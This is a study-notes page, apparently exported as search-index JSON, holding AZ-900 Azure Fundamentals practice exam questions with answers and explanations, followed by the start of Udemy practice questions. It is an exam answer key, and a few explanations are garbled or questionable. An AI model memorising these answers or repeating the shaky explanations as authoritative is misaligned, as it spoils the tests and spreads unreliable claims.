                            Regarding the Exam SC-900: Microsoft Security, Compliance, and Identity Fundamentals is targeted to those looking to familiarize themselves with the fundamentals of security, compliance, and identity (SCI) across cloud-based and related Microsoft services. This is a broad audience that may include business stakeholders, new or existing IT professionals, or students who have an interest in Microsoft security, compliance, and identity solutions.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-900-exams/","title":"Exams - Practice the AZ-900","text":"

                            The AZ-900: Notes to get through the Azure Fundamentals Certificate and these Practice exams are derived from different sources.

                            • Notes taken in: September 2023.
                            • Certification accomplish at: September 23th, 2023.
                            • Practice tests: Practice tests from different sources.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#microsoft-platform","title":"Microsoft platform","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#practice-assessment-1","title":"Practice assessment 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-of-50","title":"Question 1 of 50","text":"

                            Why is cloud computing often less expensive than on-premises datacenters? Each correct answer presents a complete solution.

                            • You are only billed for what you use.

                            Renting compute and storage services and being billed for only what you use often lowers operating expenses. Depending on the service and the type of network bandwidth, charges can be incurred. Cloud service offerings often provide functionality that can be difficult or cost-prohibitive to deploy on-premises, especially for smaller organizations. Major cloud providers offer services around the world. Making it easy and relatively inexpensive to deploy services close to where your users reside. Describe cloud computing - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-of-50","title":"Question 2 of 50","text":"

                            Select the answer that correctly completes the sentence. (------Your Answer Here -------)\u00a0refers to upfront costs incurred one time, such as hardware purchases.

                            • Capital expenditures

                            Capital expenditures are one-time expenses that can be deducted over time. Operational expenditures are billed as you use services and a do not have upfront costs.

                            Describe cloud computing - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-of-50","title":"Question 3 of 50","text":"

                            Which cloud deployment model are you using if you have servers physically located at your organization\u2019s on-site datacenter, and you migrate a few of the servers to the cloud?

                            • hybrid cloud

                            A hybrid cloud is a computing environment that combines a public cloud and a private cloud by allowing data and applications to be shared between them.

                            Describe cloud computing - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-of-50","title":"Question 4 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            Increasing compute capacity for an app by adding RAM or CPUs to a virtual machine is called\u00a0(------Your Answer Here -------).

                            • vertical scaling

                            You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. Disaster recovery keeps data and other assets safe in the event of a disaster. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-of-50","title":"Question 5 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            Deploying and configuring cloud-based resources quickly as business requirements change is called\u00a0(------Your Answer Here -------).

                            • agility

                            Agility means that you can deploy and configure cloud-based resources quickly as app requirements change. Scalability means that you can add RAM, CPU, or entire virtual machines to a configuration. Elasticity means that you can configure cloud-based apps to take advantage of autoscaling, so apps always have the resources they need. High availability means that cloud-based apps can provide a continuous user experience with no apparent downtime, even when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-of-50","title":"Question 6 of 50","text":"

                            What are cloud-based backup services, data replication, and geo-distribution features of?

                            • a disaster recovery plan

                            Disaster recovery uses services, such as cloud-based backup, data replication, and geo-distribution, to keep data and code safe in the event of a disaster. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-of-50","title":"Question 7 of 50","text":"

                            What is high availability in a public cloud environment dependent on?

                            • the service-level agreement (SLA) that you choose

                            Different services have different SLAs. Sometimes different tiers of the same service will offer different SLAs, which can increase or decrease the promised availability. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-of-50","title":"Question 8 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            An example of\u00a0(------Your Answer Here -------)\u00a0is automatically scaling an application to ensure that the application has the resources needed to meet customer demands.

                            • elasticity

                            Elasticity refers to the ability to scale resources as needed, such as during business hours, to ensure that an application can keep up with demand, and then reducing the available resources during off-peak hours. Agility refers to the ability to deploy new applications and services quickly. High availability refers to the ability to ensure that a service or application remains available in the event of a failure. Geo-distribution makes a service or application available in multiple geographic locations that are typically close to your users. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-of-50","title":"Question 9 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            Increasing the capacity of an application by adding additional virtual machine is called\u00a0(------Your Answer Here -------).

                            • horizontal scaling

                            Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Agility refers to the ability to deploy new applications and services quickly. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-of-50","title":"Question 10 of 50","text":"

                            In a platform as a service (PaaS) model, which two components are the responsibility of the cloud service provider? Each correct answer presents a complete solution.

                            • operating system
                            • physical network

                            In PaaS, the cloud provider is responsible for the operating system, physical datacenter, physical hosts, and physical network. In PaaS, the customer is responsible for accounts and identities. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-of-50","title":"Question 11 of 50","text":"

                            Which type of cloud service model is typically licensed through a monthly or annual subscription?

                            • software as a service (SaaS)

                            SaaS is software that is centrally hosted and managed for you and your users or customers. Usually, one version of the application is used for all customers, and it is licensed through a monthly or annual subscription. PaaS and IaaS use a consumption-based model, so you only pay for what you use. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-of-50","title":"Question 12 of 50","text":"

                            In which cloud service model is the customer responsible for managing the operating system?

                            • Infrastructure as a service (IaaS)

                            IaaS consists of virtual machines and networking provided by the cloud provider. The customer is responsible for the OS and applications. The cloud provider is responsible for the OS in PaaS and SaaS. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-of-50","title":"Question 13 of 50","text":"

                            What is the customer responsible for in a software as a service (SaaS) model?

                            • data and access

                            SaaS allows you to pay to use an existing application on hardware managed by a third party. You supply data and configure access. Customers are only responsible for storage in a private cloud. Customers are responsible for virtual machines and runtime in IaaS and the private cloud. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-of-50","title":"Question 14 of 50","text":"

                            What uses the infrastructure as a service (IaaS) cloud service model?

                            • Azure virtual machines

                            Azure Virtual Machines is an IaaS offering. The customer is responsible for the configuration of the virtual machine as well as all operating system configurations. Azure App Services and Azure Cosmos DB are PaaS offerings. Microsoft Office 365 is a SaaS offering. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-of-50","title":"Question 15 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            (------Your Answer Here -------)\u00a0is the logical container used to combine and organize Azure resources.

                            • a resource group

                            Resources are combined into resource groups, which act as a logical container into which Azure resources like web apps, databases, and storage accounts, are deployed and managed. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-of-50","title":"Question 16 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            In a region pair, a region is paired with another region in the same\u00a0(------Your Answer Here -------).

                            • geography

                            Each Azure region is always paired with another region within the same geography, such as US, Europe, or Asia, at least 300 miles away. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-of-50","title":"Question 17 of 50","text":"

                            What is an Azure Storage account named storage001 an example of?

                            • a resource

                            A resource is a manageable item that is available through Azure. Virtual machines, storage accounts, web apps, databases, and virtual networks are examples of resources. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-of-50","title":"Question 18 of 50","text":"

                            For which resource does Azure generate separate billing reports and invoices by default?

                            • subscriptions

                            Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs. Resource groups can be used to group costs, but you will not receive a separate invoice for each resource group. Management groups are used to efficiently manage access, policies, and compliance for subscriptions. You can set up billing profiles to roll up subscriptions into invoice sections, but this requires customization. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-of-50","title":"Question 19 of 50","text":"

                            Which resource can you use to manage access, policies, and compliance across multiple subscriptions?

                            • management groups

                            Management groups can be used in environments that have multiple subscriptions to streamline the application of governance conditions. Resource groups can be used to organize Azure resources. A inistrative units are used to delegate the administration of Azure AD resources, such as users and groups. Accounts are used to provide access to resources

                            Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-of-50","title":"Question 20 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            (------Your Answer Here -------)\u00a0is the deployment and management service for Azure.

                            • Azure Resource Manager (ARM)

                            ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure subscription. You use management features, such as access control, resource locks, and resource tags, to secure and organize resources after deployment. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-of-50","title":"Question 21 of 50","text":"

                            What can you use to execute code in a serverless environment?

                            • Azure Functions

                            Azure Functions allows you to run code as a service without having to manage the underlying platform or infrastructure. Azure Logic Apps is similar to Azure Functions, but uses predefined workflows instead of developing your own code. Describe Azure compute and networking services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-of-50","title":"Question 22 of 50","text":"

                            What can you use to connect Azure resources, such as Azure SQL databases, to an Azure virtual network?

                            • service endpoints

                            Service endpoints are used to expose Azure services to a virtual network, providing communication between the two. ExpressRoute is used to connect an on-premises network to Azure. NSGs allow you to configure inbound and outbound rules for virtual networks and virtual machines. Peering allows you to connect virtual networks together. Describe Azure compute and networking services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-of-50","title":"Question 23 of 50","text":"

                            Which two services can you use to establish network connectivity between an on-premises network and Azure resources? Each correct answer presents a complete solution.

                            • Azure VPN Gateway
                            • ExpressRoute

                            ExpressRoute connections and Azure VPN Gateway are two services that you can use to connect an on-premises network to Azure. Bastion provides a web interface to remotely administer Azure virtual machines by using SSH/RDP. Azure Firewall is a stateful firewall service used to protect virtual networks. Azure ExpressRoute: Connectivity models | Microsoft Learn. Describe Azure compute and networking services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-of-50","title":"Question 24 of 50","text":"

                            Which storage service should you use to store thousands of files containing text and images?

                            • Azure Blob storage

                            Azure Blob storage is an object storage solution that you can use to store massive amounts of unstructured data, such as text or binary data. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-of-50","title":"Question 25 of 50","text":"

                            Which Azure Blob storage tier stores data offline and offers the lowest storage costs and the highest costs to access data?

                            • Archive

                            The Archive storage tier stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. The Hot storage tier is optimized for storing data that is accessed frequently. Data in the Cool access tier can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-of-50","title":"Question 26 of 50","text":"

                            Which storage service offers fully managed file shares in the cloud that are accessible by using Server Message Block (SMB) protocol?

                            • Azure Files

                            Azure Files offers fully managed file shares in the cloud with shares that are accessible by using Server Message Block (SMB) protocol. Mounting Azure file shares is just like connecting to shares on a local network. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-of-50","title":"Question 27 of 50","text":"

                            Which two scenarios are common use cases for Azure Blob storage? Each correct answer presents a complete solution.

                            • serving images or documents directly to a browser
                            • storing data for backup and restore

                            Low storage costs and unlimited file formats make blob storage a good location to store backups and archives. Blob storage can be reached from anywhere by using an internet connection. Azure Disk Storage provides disks for Azure virtual machines. Azure Files supports mounting file storage shares. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-of-50","title":"Question 28 of 50","text":"

                            Which Azure Blob storage service tier has the highest storage costs and the fastest access times for reading and writing data?

                            • Hot

                            The Hot tier is optimized for storing data that is accessed frequently. The Cool access tier has a slightly lower availability SLA and higher access costs compared to hot data, which are acceptable trade-offs for lower storage costs. Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-of-50","title":"Question 29 of 50","text":"

                            Which two protocols are used to access Azure file shares? Each correct answer presents a complete solution.

                            • Network File System (NFS)
                            • Server Message Block (SMB)

                            Azure Files offers fully managed file shares in the cloud that are accessible via industry-standard SMB and NFS protocols. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-of-50","title":"Question 30 of 50","text":"

                            What enables a user to sign in one time and use that credential to access multiple resources and applications from different providers?

                            • single sign-on (SSO)

                            SSO enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. MFA is a process whereby a user is prompted during the sign-in process for an additional form of identification. Conditional Access is a tool that Azure AD uses to allow or deny access to resources based on identity signals. Azure AD supports the registration of devices. Describe Azure identity, access, and security - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-of-50","title":"Question 31 of 50","text":"

                            What can you use to allow a user to manage all the resources in a resource group?

                            • Azure role-based access control (RBAC)

                            Azure RBAC allows you to assign a set of permissions to a user or group. Resource tags are used to locate and act on resources associated with specific workloads, environments, business units, and owners. Resource locks prevent the accidental change or deletion of a resource. Key Vault is a centralized cloud service for storing an application secrets in a single, central location. Describe Azure identity, access, and security - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-of-50","title":"Question 32 of 50","text":"

                            Which type of strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data?

                            • defense in depth

                            A defense in depth strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data. The principle of least privilege means restricting access to information to only the level that users need to perform their work. A DDoS attack attempts to overwhelm and exhaust an application's resources. The perimeter layer is about protecting an organization's resources from network-based attacks. Describe Azure identity, access, and security - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-of-50","title":"Question 33 of 50","text":"

                            Which two services are provided by Azure AD? Each correct answer presents a complete solution.

                            • authentication
                            • single sign-on (SSO)

                            Azure AD provides services for verifying identity and access to applications and resources. SSO enables you to remember a single username and password to access multiple applications and is available in Azure AD. Describe Azure identity, access, and security - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-of-50","title":"Question 34 of 50","text":"

                            You have an Azure virtual machine that is accessed only between 9:00 and 17:00 each day.

                            What should you do to minimize costs but preserve the associated hard disks and data?

                            • Resize the virtual machine. This answer is incorrect.

                            • Deallocate the virtual machine. This answer is correct.

                            If you have virtual machine workloads that are used only during certain periods, but you run them every hour of every day, then you are wasting money. These virtual machines are great candidates to deallocate when not in use and start back when required to save compute costs while the virtual machines are deallocated. Describe cost management in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-of-50","title":"Question 35 of 50","text":"

                            You need to associate the costs of resources to different groups within an organization without changing the location of the resources. What should you use?

                            • subscriptions. This answer is incorrect.

                            • resource tags. This answer is correct.

                            Resource tags can be used to group billing data and categorize costs by runtime environment, such as billing usage for virtual machines running in a production environment. Tag resources, resource groups, and subscriptions for logical organization - Azure Resource Manager | Microsoft Learn. Describe the purpose of tags - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-of-50","title":"Question 36 of 50","text":"

                            Your organization plans to deploy several production virtual machines that will have consistent resource usage throughout the year. What can you use to minimize the costs of the virtual machines without reducing the functionality of the virtual machines?

                            • Azure Reservations

                            Azure Reservations offers discounted prices on certain Azure services. Azure Reservations can save you up to 72 percent compared to pay-as-you-go prices. To receive a discount, you can reserve services and resources by paying in advance.Spending limits can suspend a subscription when the spend limit is reached. Describe cost management in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-of-50","title":"Question 37 of 50","text":"

                            What can be applied to a resource to prevent accidental deletion?

                            • a resource lock

                            A resource lock prevents resources from being accidentally deleted or changed. Resource tags offer the custom grouping of resources. Policies enforce different rules across all resource configurations so that the configurations stay compliant with corporate standards. An initiative is a way of grouping related policies together. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-of-50","title":"Question 38 of 50","text":"

                            You need to recommend a solution for Azure virtual machine deployments. The solution must enforce company standards on the virtual machines. What should you include in the recommendation?

                            • Azure Blueprints. This answer is incorrect.

                            • Azure Policy. This answer is correct.

                            Azure policies will allow you to enforce company standards on new virtual machines when combined with Azure VM Image Builder and Azure Compute Gallery. By using Azure Policy and role-based access control (RBAC) assignments, enterprises can enforce standards on Azure resources. But on virtual machines, these mechanisms only affect the control plane or the route to the virtual machine. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-of-50","title":"Question 39 of 50","text":"

                            You need to ensure that multi-factor authentication (MFA) is enabled on accounts with write permissions in an Azure subscription. What should you implement?

                            • Azure Policy

                            Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit resources. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-of-50","title":"Question 40 of 50","text":"

                            What can you use to restrict the deployment of a virtual machine to a specific location?

                            • Azure Policy

                            Azure Policy can help to create a policy for allowed regions, which enables you to restrict the deployment of virtual machines to a specific location. Overview of Azure Policy - Azure Policy | Microsoft Learn. Describe the purpose of Azure Policy - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-of-50","title":"Question 41 of 50","text":"

                            Which management layer accepts requests from any Azure tool or API and enables you to create, update, and delete resources in an Azure account?

                            • Azure Resource Manager (ARM)

                            ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure account. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-of-50","title":"Question 42 of 50","text":"

                            What can you use to manage servers across cloud platforms and on-premises environments?

                            • Azure Arc

                            Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn. Describe the purpose of Azure Arc - Training | Microsoft Learn.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-of-50","title":"Question 43 of 50","text":"

                            What provides recommendations to reduce the cost of Azure resources?

                            • Azure Advisor

                            Azure Advisor analyzes the account usage and makes recommendations based on its set and configured rules. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-of-50","title":"Question 44 of 50","text":"

                            You have a team of Linux administrators that need to manage the resources in Azure. The team wants to use the Bash shell to perform the administration. What should you recommend?

                            • Azure CLI

                            Azure CLI allows you to use the Bash shell to perform administrative tasks. Bash is used in Linux environments, so a Linux administrator will probably be more comfortable performing command-line administration from Azure CLI. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-of-50","title":"Question 45 of 50","text":"

                            You need to create a custom solution that uses thresholds to trigger autoscaling functionality to scale an app up or down to meet user demand. What should you include in the solution?

                            • Application insights. This answer is incorrect.

                            • Azure Monitor. This answer is correct.

                            Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-of-50","title":"Question 46 of 50","text":"

                            What should you proactively review and act on to avoid service interruptions, such as service retirements and breaking changes?

                            • Azure Monitor. This answer is incorrect.

                            • health advisories. This answer is correct.

                            Health advisories are issues that require that you take proactive action to avoid service interruptions, such as service retirements and breaking changes. Service issues are problems such as outages that require immediate actions. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-of-50","title":"Question 47 of 50","text":"

                            What can you use to get notification about an outage in a specific Azure region?

                            • Azure Service Health

                            Service Health notifies you of Azure-related service issues, such as region-wide downtime. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-of-50","title":"Question 48 of 50","text":"

                            Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes?

                            • Azure Monitor

                            Azure Monitor is a platform for collecting, analyzing, visualizing, and alerting based on metrics. Azure Monitor can log data from an entire Azure and on-premises environment. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-of-50","title":"Question 49 of 50","text":"

                            What can you apply to an Azure virtual machine to ensure that users cannot change or delete the resource?

                            • a lock

                            Protect your Azure resources with a lock - Azure Resource Manager | Microsoft Learn Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-of-50","title":"Question 50 of 50","text":"

                            Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

                            Your Answer:

                            • Data Estate Insights. This answer is incorrect.
                            • Data Policy. This answer is correct.

                            Incorrect: Data Catalog \u2013\u2013 This enables data discovery. Incorrect: Data Sharing \u2013\u2013 This shares data within and between organizations. Incorrect: Data Estate Insights \u2013\u2013 This accesses data estate health. Correct: Data Policy \u2013\u2013 This governs access to data.

                            Introduction to Microsoft Purview governance solutions - Microsoft Purview | Microsoft Learn. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#exams-from-course-az-900-microsoft-azure-fundamentals-original-practice-tests","title":"Exams from \"Course AZ-900: Microsoft Azure Fundamentals Original Practice Tests\"","text":"

                            Exams from the Udemy course AZ-900: Microsoft Azure Fundamentals Original Practice Tests.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-1","title":"Test 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-azure-feature-is-specifically-designed-to-help-companies-get-their-in-house-developed-code-from-the-code-repository-through-automated-unit-testing-and-onto-azure-using-a-service-called-pipelines","title":"Question 1:\u00a0Which Azure feature is specifically designed to help companies get their in-house developed code from the code repository, through automated unit testing, and onto Azure using a service called Pipelines?","text":"
                            • Azure Monitor
                            • GitHub
                            • Azure DevOps
                            • Virtual Machines

                            Explanation: Azure DevOps contains many services, one of which is Pipelines. Pipelines allows you to build an automation that moves code (and all related dependencies) through various stages from the development environment into deployment.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-there-are-no-service-level-guarantees-sla-when-a-service-is-in-general-availability-ga","title":"Question 2: True or false: there are no service level guarantees (SLA) when a service is in General Availability (GA)","text":"
                            • FALSE
                            • TRUE

                            Explanation: False, most Azure GA services do have service level agreements. See:\u00a0https://azure.microsoft.com/en-ca/support/legal/sla/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-which-ways-does-the-azure-resource-manager-model-provide-to-deploy-resources","title":"Question 3:\u00a0Which ways does the Azure Resource Manager model provide to deploy resources?","text":"
                            • CLI
                            • Powershell
                            • Azure Portal
                            • REST API / SDK

                            Explanation: Azure Resource Manager (ARM) is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. The ARM model allows you to work with resources in a consistent manner, whether through Azure portal, PowerShell, REST APIs/SDKs, or the Command-Line Interface (CLI).

                            1. Azure Portal: This is a web-based, unified console that provides an alternative to command-line tools. You can manage your Azure resources directly through a GUI.

                            2. PowerShell: Azure PowerShell is a module that provides cmdlets to manage Azure through Windows PowerShell and PowerShell Core. You can use it to build scripts for managing and automating your Azure resources.

                            3. REST API / SDK: Azure provides comprehensive REST APIs that can be used directly or via Azure SDKs available in multiple languages. This allows developers to integrate Azure services in their applications, services, or tools.

                            4. CLI: Azure CLI is a cross-platform command-line program that connects to Azure and executes administrative commands on Azure resources. It's designed to make scripting easy, authenticate with Azure platform, and quickly run commands to perform common administrative tasks or deploy to Azure.

                            Each of these methods supports the full set of Azure Resource Manager features, and you can choose the one that best fits your workflow. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-type-of-container-is-used-to-collect-log-and-metric-data-from-various-azure-resources","title":"Question 4: What type of container is used to collect log and metric data from various Azure Resources?","text":"
                            • Log Analytics Workspace
                            • Managed Storage
                            • Append Blob Storage
                            • Azure Monitor account

                            Explanation: Log Analytics Workspace is required to collect logs and metrics. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/platform/manage-access

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-azure-service-is-meant-to-be-a-security-dashboard-that-contains-all-the-security-and-threat-protection-in-one-place","title":"Question 5:\u00a0Which Azure service is meant to be a security dashboard that contains all the security and threat protection in one place?","text":"
                            • Azure Portal Dashboard
                            • Azure Security Center
                            • Azure Key Vault
                            • Azure Monitor

                            Explanation: Azure Security Center - unified security management and threat protection; a security dashboard inside Azure Portal. See:\u00a0https://azure.microsoft.com/en-us/services/security-center/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-a-ddos-attack","title":"Question 6: What is a DDoS attack?","text":"
                            • A denial of service attack that sends so much traffic to a network that it cannot respond fast enough; legitimate users become unable to use the service
                            • An attempt to read the contents of a web page from another website, thereby stealing the user's private information
                            • An attempt to send SQL commands to the server in a way that it will execute them against the database
                            • An attempt to guess a user's password through brute force methods

                            Explanation: Distributed Denial of Service attacks (DDoS) -a type of attack that originates from the Internet that attempts to overwhelm a network with millions of packets of bad traffic that aims to prevent legitimate traffic from getting through. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-in-the-context-of-cloud-computing-and-azure-services-how-would-you-define-compute-resources","title":"Question 7:\u00a0In the context of cloud computing and Azure services, how would you define 'compute resources'?","text":"
                            • They include all resources listed in the Azure Marketplace.
                            • They are resources that execute tasks requiring CPU cycles.
                            • They refer exclusively to Virtual Machines.
                            • They encompass Virtual Machines, Storage Accounts, and Virtual Networks.

